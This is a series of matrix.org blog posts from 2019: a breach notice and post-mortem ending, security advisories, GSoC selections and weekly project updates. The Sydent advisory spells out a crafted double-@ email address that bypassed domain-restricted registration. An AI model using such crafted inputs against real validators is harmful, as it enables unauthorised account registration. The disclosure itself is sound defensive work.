  • Turning on end-to-end encryption by default, so that even if a server is compromised, the attacker cannot get at private message history. Everyone who uses E2EE in Matrix should have felt some relief that even though the server was compromised, their message history was safe: we need to provide that to everyone. This is https://github.com/vector-im/riot-web/issues/6779.
  • We need device audit trails in Matrix, so that even if a compromised server (or malicious server admin) temporarily adds devices to your account, you can see what’s going on. This is https://github.com/matrix-org/synapse/issues/5145
  • We need to empower users to configure history retention in their rooms, so they can limit the amount of history exposed to an attacker. This is https://github.com/matrix-org/matrix-doc/pull/1763
  • We need to provide account portability (aka decentralised accounts) so that even if a server is compromised, the users can seamlessly migrate elsewhere. The first step of this is https://github.com/matrix-org/matrix-doc/pull/1228.

Conclusion

Hopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing to protect against this happening in future.

Again, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for your patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up in this situation, at least we should be coming out of it much stronger, at least in terms of infrastructure security. We’d also like to particularly thank Kade Morton for providing independent review of this post and our remediations, and everyone who reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally thanks to the those of the Matrix team who hauled ass to rebuild the infrastructure, and also those who doubled down meanwhile to keep the rest of the project on track.

On which note, we’re going to go back to building decentralised communication protocols and reference implementations for a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of extreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.

Given the new blog doesn't have comments yet, feel free to discuss the post over at HN.

Welcome to the 2019 GSoC Participants!

07.05.2019 00:00 — GSOCAndrew Morgan

It’s that time of year again! Matrix.org is once again participating in the Google Summer of Code program. We have been allocated four student slots by Google this year, and narrowing the 18 proposals we received down to just four was a very difficult task.

In the end, we have decided on the following four students and their proposed projects:

Alexey Andreyev’s proposal involves adding end-to-end encryption to libQMatrixClient for future support in Qt/libQMatrixClient-based clients such as Quaternion and Spectral. They will be mentored by kitsune, lead developer of libQMatrixClient, and our own end-to-end encryption expert, uhoreg.

Kai Hiller’s proposal for more reliable third-party protocol bridges includes adding the ability to notify the user when a message fails to reach its final destination despite being accepted by the bridge. Half-Shot.

Eisha Chen-yen-su’s proposal for Matrix Visualisations aims to “develop a tool which will visualise the event Directed Acyclic Graph data structure which describes the conversation history in a room. It will be a real-time visualisation of the DAG of a given Matrix room, as seen from the perspective of one or more HomeServers (HSes).” They state that “this tool will be useful for debugging or administration of Matrix HSes by making people able to easily see how the federation process works”. They have already posted prototypes of their tool in #gsoc:matrix.org, and it’s all written in Rust! Which makes their mentor, erikj, very happy.

And finally, Cnly’s proposal for working towards completion of Dendrite’s Client-Server API. The proposal also touches on general improvements to the codebase and increasing test coverage. Cnly will be mentored by babolivier and anoa.

Congratulations to the selected students. We look forward to participating with you on completing your project over the course of the summer holidays.

If your proposal was not selected, do not give up hope! Being an active member of the Matrix community and having a deep understanding of the ecosystem and its projects is a big part of what we look for when choosing candidates. If you stick around, you have a strong chance of being chosen in a subsequent year.

We will not be sharing individual’s proposal documents, but students are free to share them as they please.

Security updates: Sydent 1.0.3, Synapse 0.99.3.1 and Riot/Android 0.9.0 / 0.8.99 / 0.8.28a

03.05.2019 00:00 — General, SecurityMatthew Hodgson

Hi all,

Over the last few weeks we’ve ended up getting a lot of attention from the security research community, which has been incredibly useful and massively appreciated in terms of contributions to improve the security of the reference Matrix implementations.

We’ve also set up an official Security Disclosure Policy to explain the process of reporting security issues to us safely via responsible disclosure - including a Hall of Fame to credit those who have done so. (Please mail [email protected] to remind us if we’ve forgotten you!).

Since we published the Hall of Fame yesterday, we’ve already been getting new entries and so we’re doing a set of security releases today to ensure they are mitigated asap. Unfortunately the work around this means that we’re running late in publishing the post mortem of the Apr 11 security incident - we are trying to get that out as soon as we can.

Sydent 1.0.3

Sydent 1.0.3 has three security fixes:

  • Ensure that authentication tokens are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. This is an important fix - please update. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing the issue!
  • Mitigate an HTML injection bug where an invalid room_id could result in malicious HTML being injected into validation emails. The fix for this is in the email template itself; you will need to update any customised email templates to be protected. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!
  • Randomise session_ids to avoid leaking info about the total number of identity validations, and whether a given ID has been validated. Thanks to @fs0c131y for identifying and responsibly disclosing this one.

If you are running Sydent as an identity server, you should update as soon as possible from https://github.com/matrix-org/sydent/releases/v1.0.3. We are not aware of any of these issues having been exploited maliciously in the wild.

Synapse 0.99.3.1

Synapse 0.99.3.1 is a security update for two fixes:

  • Ensure that random IDs in Synapse are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue!
  • Add 0.0.0.0/32 and ::/128 to the URL preview blacklist configuration, ensuring that an attacker cannot make connections to localhost. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!

You can update from https://github.com/matrix-org/synapse/releases or similar as normal. We are not aware of any of these issues having been exploited maliciously in the wild.

(Synapse 0.99.3.2 was released shortly afterwards to fix a non-security issue with the Debian packaging)

Riot/Android 0.9.x/0.8.99 (Google Play) and 0.8.28a (F-Droid)

Riot/Android has an important security fix which shipped over the course of the last week in various versions of the app:

  • Remove obsolete and buggy ContentProvider which could allow a malicious local app to compromise account data. Many thanks to Julien Thomas (@julien_thomas) from Protektoid Project for identifying this and responsibly disclosing it!

The fix for this shipped on F-Droid since 0.8.28a, and on the Play Store, the fix is present in both v0.9.0 (the first version of the re-published Riot app) and v0.8.99 (the last version of the old Riot app, which told everyone to reinstall). Other forks of Riot which we’re aware of have also been informed and should be updated.

If you haven’t already updated, please do so now.

This Week in Matrix 2019-05-03

03.05.2019 00:00 — This Week in MatrixBen Parsons

New matrix.org Security Disclosure Policy and moderation pages

Check out the Matrix Official Security Disclosure Policy, which also features a "Hall of Fame": https://matrix.org/security-disclosure-policy/

We also have an official moderation guide now at https://matrix.org/docs/guides/moderation

Servers

Synapse

Last week

Work progresses on reactions support, expect a more formal MSC rsn, but for check out https://github.com/matrix-org/matrix-doc/blob/matthew/msc1849/proposals/1849-aggregations.md for more details. Aside from that we now have an API to send server notices, support is coming for blacklisting IP ranges for federation traffic and finally we published a security disclosure policy and hall of fame https://matrix.org/security-disclosure-policy/. We’ve also been tracking down some device management bugs that prevent e2e message decryption as well as fixing some security bugs.

Next week

More reactions work, device management bug hunting and server key validity support.

Crypto

  • Olm 3.1.2 bugfix release.
  • Pantalaimon: Initial SAS support through panctl http://webmshare.com/play/QeBY1
  • Pantalaimon: Support for sending out key requests.

Clients

There are some BIG (capital and bold!) client releases this week, let's take a look

Quaternion 0.0.9.4

Big release for Quaternion this week, following lots of work on libQMatrixClient. kitsune reports that:

Quaternion is now officially at version 0.0.9.4! Optional native scrollbar for the timeline, files uploading, initial support of matrix.to links (the foundation for future Matrix URIs), first complete translations, and much much more - the long list is here: https://github.com/QMatrixClient/Quaternion/releases/tag/0.0.9.4. Packagers are advised to take a look at the building and packaging section of the release notes: there are a few updates for you there.

Spectral

Continuing the QT-client theme, Black Hat has released a new version of Spectral to FlatHub, join #spectral:matrix.org for more:

A new version of Spectral is released on Flathub this week! The last release is half a year ago, and there are a lot of changes since then, including a better UI, bug fixes and performance improvements.

Changelog:

Increase minimum Qt version to 5.12.
Redesigned UI.
Emoji and username auto completion in text input.
Respect server-side notification settings.
Emoji picker.
Fix font size in HiDPI.
Improved reply UI/UX and rich reply UI.
Sending/receiving typing notifications.
Switch to hoedown for parsing markdown.
Display notification count.
Responsive UI.
Fix #2(Room/People separator issue).
Infer device name from system information.
Image caching.

And of course various performance improvements. For my account Spectral takes ~35MB RAM initially, compared to 45~50MB before.

Pattle new release

pattle screenshots

Wilko came to announce a new Pattle release, that's the Flutter client:

A new release of Pattle has been pushed to F-droid! Lots of different changes this release, including:

  • Viewing images!
  • Actual local echo (message is immediately placed in the timeline)
  • Sent state indicators are now shown next to the message time (clock for still being sent and a checkmark for sent)
  • Show member change events! (x has joined, left, invited, etc)
  • Thumbnails are now used for chat avatars, which should improve performance a bit
  • Other small fixes :)

Check out a video demo at here.

continuum

yuforia reports that:

This week in continuum:

  • Remove support for embedded webview and open external browsers when necessary instead. Many users actually prefer it this way. And dependency on a fairly large native module is gone.
  • Improvements on the emoji input. Removed some style classes and tweaked some sizes to make the appearance more compact and flat. https://matrix.org/_matrix/media/v1/download/matrix.org/PvFFPAvoDhiHghsyeJnWVyAK

Riot Web

Initial UI work on reactions and editing, nothing useable yet though.

Riot iOS

  • Release of 0.8.5 :
    • Grouped notifications
    • Interactive device verification (by emoji)
    • WebRTC and Jitsi libs updates
    • min iOS version is now 10 (Jitsi constraints)
  • Initial UI work on reactions, nothing useable yet though.

Riot Android

Benoit from the Riot team:

  • CI has been configured on Buildkite for the Android matrix sdk, riot and riotx.
  • The Android sdk can now be integrate as a grate dependency via Jitpack.
  • Riot 0.9.1 has been released with sas feature included! Device verification is easier with riot web and riot Android users, soon with riot ios users. Will be on production channel on Monday.
  • We have finally pushed the security fix on GH.
  • Also working on the crypto modularization to integrate it on RiotX.
  • We will concentrate our effort on RiotX now

RiotX (Android)

  • Working on reactions

Bridges

matrix-appservice-discord searching for a new maintainer

Sorunome reports that:

We (matrix-appservice-discord) are looking for a new maintainer!

What are we looking for in a maintainer?
You wouldn't have to be super active, however a few minutes per day would be greatly appreciated. You'd be responsible of reviewing PRs! Because of this not being afraid of Typescript and not being afraid of Discord is required - no need to be at pro-level!

So we are basically looking for someone who can help us look over PRs and maybe do some themself. If you think you are interested, please message us in our matrix room!

Bridging Facebook Messenger

tulir:

I made a new Facebook Messenger bridge: https://github.com/tulir/mautrix-facebook / #facebook:maunium.net. Currently the main difference to matrix-puppet-facebook is multi-user support like my WhatsApp and Telegram bridges. The bridge is Python and the code structure is similar to mautrix-telegram, so I'll probably eventually create a generic bridge library out of the common parts.

SDKs and Frameworks

Ruby SDK

Ananace reports that:

Working on the Ruby SDK again, planning to try and get it to the point where I feel comfortable calling it a provisionary 1.0 release. I want to propose additions to various software using it after all, and that tends to look better if it's 1.0 - or close. 😃

That's all I know

That's all for this week folks, come chat in #twim:matrix.org for more, or to share what you've been working on.

PS this interesting-looking project is not ready for public eyes on it yet, so please refrain from checking out the code and discussing with the author in #tangent:matrix.org

This Week in Matrix 2019-04-26

26.04.2019 00:00 — This Week in MatrixNeil Johnson

Hello and welcome

No Ben this week. I'm afraid this means no matrix live, but fear not your Ben orientated programming will resume next week.

Things that have happened

Riot Android

  • New Riot.im application has been delivered to the PlayStore: https://play.google.com/store/apps/details?id=im.vector.app. It replaces the previous app. More details here: https://medium.com/@RiotChat/riot-im-android-security-update-2b3f655ad739
  • François and Benoit were at AndroidMakers Paris on Tuesday and Wednesday. We’ve seen plenty of interesting conferences and come back with many ideas to improve Riot UX/UI/Implementation/testing/etc.
  • SAS device verification review is over, will be merged once we have the tagged OLM library.

RiotX (Android)

  • Valere has started working on reactions (which will be implemented only on RiotX for Android).
  • François has worked on merging membership Events in the timeline

Riot iOS

  • Interactive device verification has been merged
  • Jitsi and WebRTC updates have been merged
  • Fix bugs in order to prepare a release

Crypto

uhoreg reports that:

olm 3.1.0 has been released. This release adds new functions to help with SAS-based key verification (a.k.a. emoji-based verification) and with cross-signing. The Python bindings are also now available on pypi, so you can install it using "pip install python-olm", though you need the olm library and development files installed first.

Also

  • Python-olm available on pypi.
  • Initial SAS verification support for nio.

Spectral

Black Hat reports that:

Spectral's redesign continues, featuring a beautiful responsive UI(not kirigami yet, sorry) and more functionalities. Legacy UIs such as the room detail panel are changed to fit into redesigned UI better. Basic room upgrade support is added, allowing you to switch between the old room and the new room. Room settings and user detail dialogs are added. You can also ignore users in the user detail dialog.

matrix-nsfw

A Black Hat double header this week:

matrix-nsfw has been ported from Golang to Rust. The backend machine learning framework is also switched to Tensorflow, giving a major performance boost. For anyone that doesn't know what matrix-nsfw is, it is a bot-like utility that detects NSFW images in a room. The new repo is at https://gitlab.com/b0/matrix-nsfw-rust

Neo

Sometimes a picture tells a thousands rainbow coloured words. Thanks Foks

Ruma

Jimmy reports that:

All of Ruma's libraries (but not yet the homeserver itself) are now targeting stable Rust!

Continiuum

yuforia reports that:

  • If a room member is not visible on screen, updating their name doesn't require switching to the main UI thread
  • Apply formatting when viewing the json source of an event
  • Reuse GUI components to improve performance, update content of views instead of creating new ones
  • Use a hash set to avoid going through the list of room members in some cases * Move more of local storage into the database: names and avatars of users and rooms, room membership, recently used accounts, etc.
  • Placeholder avatars are made with GUI components and instead of generated bitmap images
  • Switch to gradle multi-project build to modularize

After switching from plaintext files to an embedded database, some components are still in the process of being rewritten, coming next week: load messages from server on demand when scrolling, if they are not yet stored in database; add support for invitations;

matrix-appservice-discord

Sorunome reports that:

matrix-appservice-discord work has finally resumed! The PRs for both migrating the room and user store to SQL have been merged, and many awesome new things should follow up soon!

Synapse

The reactions and edits API is taking shape, we’re making progress on our small homeserver setup, and we’re hunting a new set of device key management bugs that came to light in the absence of matrix.org.

We’ve been a bit disrupted these past few weeks, but work towards Synapse 1.0 continues and we’ll soon be ready to offer a release candidate.

miniVector

Curious Cat reports that: >miniVector 0.8.29 is available on Goldy and Froid (and are unaffected by the Riot/Android re-release drama).

The 'Incident'

We know you'll have a bunch of questions, we'll be publishing a full post-mortem next week. Thanks for bearing with us.

The End

See you next week, it will be Bentastic I can assure you. Be sure to stop by #twim:matrix.org with your updates!

Security Update: Sydent 1.0.2

18.04.2019 00:00 — GeneralMatrix.org Team

Overview

We became aware today of a flaw in sydent’s validation of email addresses which can lead to a failure to correctly limit registration to a given email domain. This only affects people who run their own sydent, and are relying on allowed_local_3pid in their synapse config. We’d like to thank @fs0c131y for bringing it to our attention on Twitter this morning. We are not aware of this being exploited in the wild other than the initial report.

If you are running your own sydent, and limiting signup for your server using the allowed_local_3pids configuration option, then you need to upgrade your sydent immediately to Sydent 1.0.2.

Meanwhile, if you have been relying on the allowed_local_3pids configuration option to restrict access to your homeserver, you may wish to check your homeserver’s user_threepids table for malformed email addresses and your sydent’s database as follows:

$ sqlite3 sydent.db 
sqlite> select count(*) from global_threepid_associations where address like '%@%@%';
0

$ psql matrix
matrix=> select count(*) from user_threepids where address like '%@%@%';
 count 
-------
     0

If the queries return more than 0 results, please let us know at [email protected] - otherwise you are fine.

Details

A flaw existed in sydent whereby it was possible to bypass the requirement specified in synapse’s allowed_local_3pids option, which restricts that users may only register with an email address matching a specific format.

This relied on two things:

  1. sydent uses python's email.utils.parseaddr function to parse the input email address before sending validation mail to it, but it turns out that if you hand parseaddr an malformed email address of form [email protected]@c.com, it silently discards the @c.com prefix without error. The result of this is that if one requested a validation token for '[email protected]@important.com', the token would be sent to '[email protected]', but the address '[email protected]@important.com' would be marked as validated. This release fixes this behaviour by asserting that the parsed email address is the same as the input email address.
  2. synapse's checking of email addresses relies on regular expressions in the home server configuration file. synapse does not validate email addresses before checking them against these regular expressions, so naive regular expressions will detect the second domain in email addresses such as the above, causing them to pass the check.

You can get sydent 1.0.2 from https://github.com/matrix-org/sydent/releases/tag/v1.0.2.

This Week in Matrix 2019-04-18

18.04.2019 00:00 — This Week in MatrixMatrix.org Team

Welcome to the new blog!

Check out the new digs! We're happy with this newly deployed blog, and all the old and loveable content is right down there. If you find issues, let me know. You may remember Nad, from previous editions of Matrix Live - huge thanks to him for his work on the design and upkeep of this new deployment.

Notes from the downtimes

Github tokens

jaywink:

Due to the security incident, all GitHub access tokens for the Scalar GitHub integration were cleared. This means that if you have a GitHub bot in the channel and want to use the !github bot commands, you need to re-login to github via the integration manager menu. Note, existing webhooks are untouched and should work fine without re-authenticating.

Bridges

Half-Shot:

From the matrix.org bridge team, we are resurrecting bridges as fast as possible. Currently running are the freenode, slack, gitter and gimpnet (now hosted on gnome.org) with more to come today and next week.
We have the snoonet and oftc irc bridges back. Mozilla is coming soon hopefully this weekend too!

Whoop! Mozilla is actually up now!

Pattle new release on F-Droid

Wilko:

A big release of Pattle has just been pushed to the F-droid repo! Changes include:

  • Display names are now shown
  • You can now click on chats and view them!
  • Messages are grouped by time and sender (see screenshots)
  • Add fancy transition animation and ripples to chat messages (see video)
  • Use Sentry for error reporting (only Android version and device model is sent, along with the stacktrace of the error)

Also, please note that if you have a matrix.org you probably have reinstall the app if you're logged in because of the recent matrix.org incident (because there's no logout button yet and no detection for invalidated access tokens)

There has actually been a release since, which includes:

message sending and viewing image history!

libQMatrixClient 0.5.1.2 && Quaternion 0.0.9.4

kitsune is talking about the long road to 0.0.9.4:

libQMatrixClient 0.5.1.2 has been released, with all the remaining bugfixes for Quaternion 0.0.9.4 that's coming any day soon now. The release notes are here: https://github.com/QMatrixClient/libqmatrixclient/releases/tag/0.5.1.2

Quaternion 0.0.9.4 RC3, the last one before the release that will happen in the nearest days, is out. Release notes can be found at https://github.com/QMatrixClient/Quaternion/releases/tag/0.0.9.4-rc3. Translators, you literally have hours to add your translations for 0.0.9.4!

neo

I reimplemented the matrix sdk into Neo, so it works nicer. Colors and font look nicer (base16-tomorrow, Open Sans), and there's text message sending, with localecho!
I also fixed a bug where react would recycle displayname-components across rooms, attributing them to the wrong messages

a video at https://lain.haus/_matrix/media/v1/download/lain.haus/VfshWRfaNUnpGQbdkyYczxvd

Go test Neo at: https://neo.lain.haus/neo

matrix-registration update

ZerataX:

it's been a long while, but I've finally come around to improving on matrix-registration
For those of you, who have forgotten what this project is about, it basically lets you invite people to your homeserver with tokens, e.g. https://homeserver.tld/register?token=DoubleWizardSky
This whole update was about making the project more user friendly.
I made a new default registration page that requires 0 setup and you can install the project right from pypi with pip, so you don't even need to clone the repo any longer.
check a live example here: https://chat.dmnd.sh/register
and to play around with the api you can can go over to the github page: https://zeratax.github.io/matrix-registration/demo.html?token=ColorWhiskeyExpand
channel: #matrix-registration:dmnd.sh
github: https://github.com/zeratax/matrix-registration

Video available here.

matrix-media-repo now has s3 support

TravisR:

matrix-media-repo now has s3 (and s3-like) support, making it easier to archive older media or use minimal disk space. See the new datastores option in the config and the admin docs ( https://github.com/turt2live/matrix-media-repo/blob/master/docs/admin.md#datastore-management ) for more information.

Dimension

TravisR:

Dimension has been updated to more safely handle when upstream integration managers (like Scalar) are offline. Instead of crashing or breaking in various ways, it'll report which integrations are not accessible.
As well, due to recent events, if you use matrix.org bots or bridges in Dimension then go the the admin section and log everyone out using the red button. Dimension caches upstream tokens and isn't smart enough to realize that they are no longer valid, which means they need clearing. Clients should automatically handle getting new tokens in the background.

Riot iOS

  • Interactive device verification is still in progress
  • Update WebRTC and Jitsi libs (in progress)

Riot Android

*We are finalizing SAS device verification feature *We are preparing a release to fix some issues

RiotX (Android)

  • We can now clear the cache of the application (Riot legacy feature)
  • Sync filter has been implemented
  • François is working on thumbnail of video (upload and preview) in the timeline

That's all I know

See you next week, and be sure to stop by #twim:matrix.org with your updates!

We have discovered and addressed a security breach. (Updated 2019-04-12)

11.04.2019 00:00 — GeneralMatrix.org Team

Update: for the full story here, please see the post mortem.

Here's what you need to know.

TL;DR: An attacker gained access to the servers hosting Matrix.org. The intruder had access to the production databases, potentially giving them access to unencrypted message data, password hashes and access tokens. As a precaution, if you're a matrix.org user you should change your password now.

The matrix.org homeserver has been rebuilt and is running securely; bridges and other ancillary services (e.g. this blog) will follow as soon as possible. Modular.im homeservers have not been affected by this outage.

The security breach is not a Matrix issue.

The hacker exploited a vulnerability in our production infrastructure (specifically a slightly outdated version of Jenkins). Homeservers other than matrix.org are unaffected.

How does this affect me?

We have invalidated all of the active access tokens for users on Matrix.org - all users have been logged out.

Users with Matrix.org accounts should:

  • Change your password now - no plaintext Matrix passwords were leaked, but weak passwords could still be cracked from the hashed passwords
  • Change your NickServ password (if you're using IRC bridging) - there's no evidence bridge credentials were compromised, but if you have given the IRC bridges credentials to your NickServ account we would recommend changing this password

And as a reminder, it's good practice to:

  • Review your device list regularly - make sure you recognise all of the devices connected to your account
  • Always make sure you enable E2E encryption for private conversations

What user data has been accessed?

Forensics are ongoing; so far we've found no evidence of large quantities of data being downloaded. The attacker did have access to the production database, so unencrypted content (including private messages, password hashes and access tokens) may be compromised.

What has not been affected?

  • Source code and packages have not been impacted based on our initial investigations. However, we will be replacing signing keys as a precaution.
  • Modular.im servers are not affected, based on our initial analysis
  • Identity server data does not appear to have been compromised

The target appeared to be internal credentials for onward exploits, not end user information from the matrix.org homeserver.

You might have lost access to your encrypted messages.

As we had to log out all users from matrix.org, if you do not have backups of your encryption keys you will not be able to read your encrypted conversation history. However, if you use server-side encryption key backup (the default in Riot these days) or take manual key backups, you’ll be okay.

This was a difficult choice to make. We weighed the risk of some users losing access to encrypted messages against that of all users' accounts being vulnerable to hijack via the compromised access tokens. We hope you can see why we made the decision to prioritise account integrity over access to encrypted messages, but we're sorry for the inconvenience this may have caused.

What happened?

We were using Jenkins for continuous integration (automatically testing our software). The version of Jenkins we were using had a vulnerability (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002) which allowed an attacker to hijack credentials (forwarded ssh keys), giving access to our production infrastructure. Thanks to @jaikeysarraf for drawing this to our attention.

Timeline

March 13th Updated 2019-04-12 11:00 UTC

  • Attacker compromises Jenkins CI server

April 4th Updated 2019-04-12 11:00 UTC

  • Attacker gains access to production infrastructure by hijacking a forwarded SSH agent logging into the compromised Jenkins worker

April 9th

  • Jenkins vulnerability brought to our attention by @jaikeysarraf

April 10th

  • Investigation identified the compromised machines and the full scope of the attack
  • Jenkins was removed
  • Attacker's access to compromised machines was removed

April 11th

  • Matrix.org was taken offline and production infrastructure fully rebuilt
  • Having fully flushed out the attacker, external communication was published informing users and advising on next steps
  • Matrix.org homeserver restored, with bridges and ancillary services (e.g. this blog) following as soon as possible

Update 2019-04-12

At around 5am UTC on Apr 12, the attacker used a cloudflare API key to repoint DNS for matrix.org to a defacement website (https://github.com/matrixnotorg/matrixnotorg.github.io). The API key was known compromised in the original attack, and during the rebuild the key was theoretically replaced. However, unfortunately only personal keys were rotated, enabling the defacement. We are currently doublechecking that all compromised secrets have been rotated.

The rebuilt infrastructure itself is secure, however, and the DNS issue has been solved without further abuse. If you have already changed your password, you do not need to do so again.

The defacement confirms that encrypted password hashes were exfiltrated from the production database, so it is even more important for everyone to change their password. We will shortly be messaging and emailing all users to announce the breach and advise them to change their passwords. We will also look at ways of non-destructively forcing a password reset at next login.

The attacker has also posted github issues detailing some of their actions and suggested remediations at https://github.com/matrix-org/matrix.org/issues/created_by/matrixnotorg.

This confirms that GPG keys used for signing packages were compromised. These keys are used for signing the synapse debian repository (AD0592FE47F0DF61), and releases of Riot/Web (E019645248E8F4A1). Both keys have now been revoked. The window of compromise for the keys started from April 4th; there have been no Synapse releases since then. There has been one release of Riot/Web (1.0.7), however as the key was passphrased and based on our initial analysis of the release, we believe it to be secure.

What are we doing to prevent this in future?

Once things are back up and running we will retrospect on this incident in detail to identify the changes we need to make. We will provide a proper postmortem, including follow-up steps; meanwhile we are obviously going to take measures to improve the security of our production infrastructure, including patching services more aggressively and more regular vulnerability scans.

Synapse: Deprecating Postgres 9.4 and Python 2.x

08.04.2019 00:00 — GeneralNeil Johnson

TL;DR DON'T PANIC - Synapse 1.0 will support Postgres 9.4 and Python 2.7

Folks, this is an update to explain that we will be shortly deprecating Synapse support for Postgres 9.4 and Python 2.x.

What are we doing?

From the dates described below, we will no longer guarantee support for deprecated versions. This means that Synapse may continue to work with these versions but we will not make any attempt to ensure compatibility and will remove old library versions from our CI.

When is this happening?

Synapse 1.0 will continue to support both technologies, but subsequent releases may not:-

For Python, we shared that we would discontinue to Python 2.x support from April 1st 2019, so for the first release that follows 1.0 we do not guarantee Python 2.x support.

For Postgres, will give server admins 6 weeks to upgrade to a newer version, and will guarantee support up until 20th May 2019.

Why would you do this to us?

We have multiple reasons, but broadly:-

  • We want to make use of new language features not supported in old versions. This will enable us to continue to improve the performance and maintainability of Synapse.
  • Python 2.x overall will be end of life'd at the end of the year. Postgres 9.4's final release will follow 2 months later on 13th February 2020.
  • Since very few server admins still use these technologies on the wild, providing support is costly and we want to reduce our overall maintenance load.

La la la I am ignoring you - what will happen?

You will be able to upgrade to Synapse 1.0, but will likely experience incompatibilities that prevent you upgrading further. Seriously, you really need to upgrade.

Okay, but I have questions, where should I go?

Come and say Hi in #synapse:matrix.org and we'll do our best to help you.